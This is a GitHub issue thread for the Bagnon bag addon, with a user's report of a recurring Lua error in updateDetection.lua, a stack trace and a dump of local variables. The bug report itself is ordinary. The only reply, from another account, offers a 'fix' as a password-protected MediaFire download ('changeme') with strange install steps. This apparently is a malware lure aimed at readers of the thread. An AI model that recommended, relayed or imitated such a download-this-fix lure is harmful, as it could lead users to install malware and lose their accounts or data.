### ISSUE TITLE
Constant Lua Errors While Standing Idle Conflict with All The Things?

### ISSUE THREAD

**Issue by JaskuraLunaris** [Jaliborc/Bagnon#1940]
**Which software were you running?**
 - Addon version name:  Bagnon 11.0.8 & AllTheThings 4.0.8
 - Client used: Retail 11.0.2

**Have you read the changelog?**
 Mark if read.

**Please describe the bug.**
Standing idle. Not opening bags. Lua error frame consistently popping with the error data shown below.
Edit: Error is still persisting even with turning off All The things. 

**Please describe how to reproduce it.**
Standing idle. Issue upon login.

**Any Screenshots?**
N/A error string below.

**Error Logs are Important!**
Message: .../AddOns/BagBrother/core/features/updateDetection.lua:49: attempt to index local 'latest' (a nil value)
Time: Mon Aug 26 20:54:22 2024
Count: 28
Stack: .../AddOns/BagBrother/core/features/updateDetection.lua:49: attempt to index local 'latest' (a nil value)
[string "@Interface/AddOns/BagBrother/core/features/updateDetection.lua"]:49: in function `?'
[string "@Interface/AddOns/AllTheThings/lib/CallbackHandler-1.0/CallbackHandler-1.0.lua"]:109: in function <...ings/lib/CallbackHandler-1.0/CallbackHandler-1.0.lua:109>
[string "=[C]"]: ?
[string "@Interface/AddOns/AllTheThings/lib/CallbackHandler-1.0/CallbackHandler-1.0.lua"]:19: in function <...ings/lib/CallbackHandler-1.0/CallbackHandler-1.0.lua:15>
[string "@Interface/AddOns/AllTheThings/lib/CallbackHandler-1.0/CallbackHandler-1.0.lua"]:54: in function `Fire'
[string "@Interface/AddOns/BagBrother/libs/AceEvent-3.0/AceEvent-3.0.lua"]:120: in function <...AddOns/BagBrother/libs/AceEvent-3.0/AceEvent-3.0.lua:119>

Locals: self = <table> {
 Queued = <table> {
 }
 Tag = "BAGNON_"
}
_ = "CHAT_MSG_ADDON"
prefix = "Bagnon"
version = "11.0.8"
channel = "GUILD"
sender = "Elysände-EmeraldDream"
latest = nil
(*temporary) = nil
(*temporary) = nil
(*temporary) = nil
(*temporary) = "attempt to index local 'latest' (a nil value)"
ADDON = "Bagnon"
Addon = <table> {
 IsRetail = true
 InventoryBags = <table> {
 }
 Currency = <table> {
 }
 Skins = <table> {
 }
 ItemGroup = <table> {
 }
 AccountMoney = <table> {
 }
 GeneralOptions = Frame {
 }
 ContainerItemGroup = <table> {
 }
 BankTab = <table> {
 }
 Frame = <table> {
 }
 OptionsToggle = <table> {
 }
 Bag = <table> {
 }
 CurrencyTooltipCounts = <table> {
 }
 Base = <table> {
 }
 Patrons = Frame {
 }
 sets = <table> {
 }
 Help = Frame {
 }
 DisplayOptions = Frame {
 }
 SlotOptions = Frame {
 }
 Name = "Bagnon"
 FrameOptions = Frame {
 }
 OptionsPanel = <table> {
 }
 guild = <table> {
 }
 Parented = <table> {
 }
 player = <table> {
 }
 ItemSlot = <table> {
 }
 SearchToggle = <table> {
 }
 Cacher = <table> {
 }
 NumBags = 5
 ReagentButton = <table> {
 }
 SearchFrame = <table> {
 }
 Item = <table> {
 }
 IsClassic = false
 BankBags = <table> {
 }
 Title = <table> {
 }
 Slash = "bgn"
 OwnerSelector = <table> {
 }
 SideFilters = <table> {
 }
 Commands = <table> {
 }
 Sorting = <table> {
 }
 SortButton = <table> {
 }
 LastBankTab = 17
 BrokerCarrousel = <table> {
 }
 ContainerItem = <table> {
 }
 BagToggle = <table> {
 }
 BagGroup = <table> {
 }
 Events = <table> {
 }
 LDB = <table> {
 }
 TooltipCounts = <table> {
 }
 AutoDisplay = <table> {
 }
 LastBankBag = 12
 Tag = "BAGNON_"
 Inventory = <table> {
 }
 CurrencyTracker = <table> {
 }
 DropButton = <table> {
 }
 Owners = <table> {
 }
 Settings = <table> {
 }
 Bank = <table> {
 }
 Rules = <table> {
 }
 Frames = <table> {
 }
 MoneyFrame = <table> {
 }
 Tipped = <table> {
 }
 UpdateDetection = <table> {
 }
 CurrencyLimit = 30
 None = <table> {
 }
 Version = "11.0.8"
}
nextExpansion = 130000

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
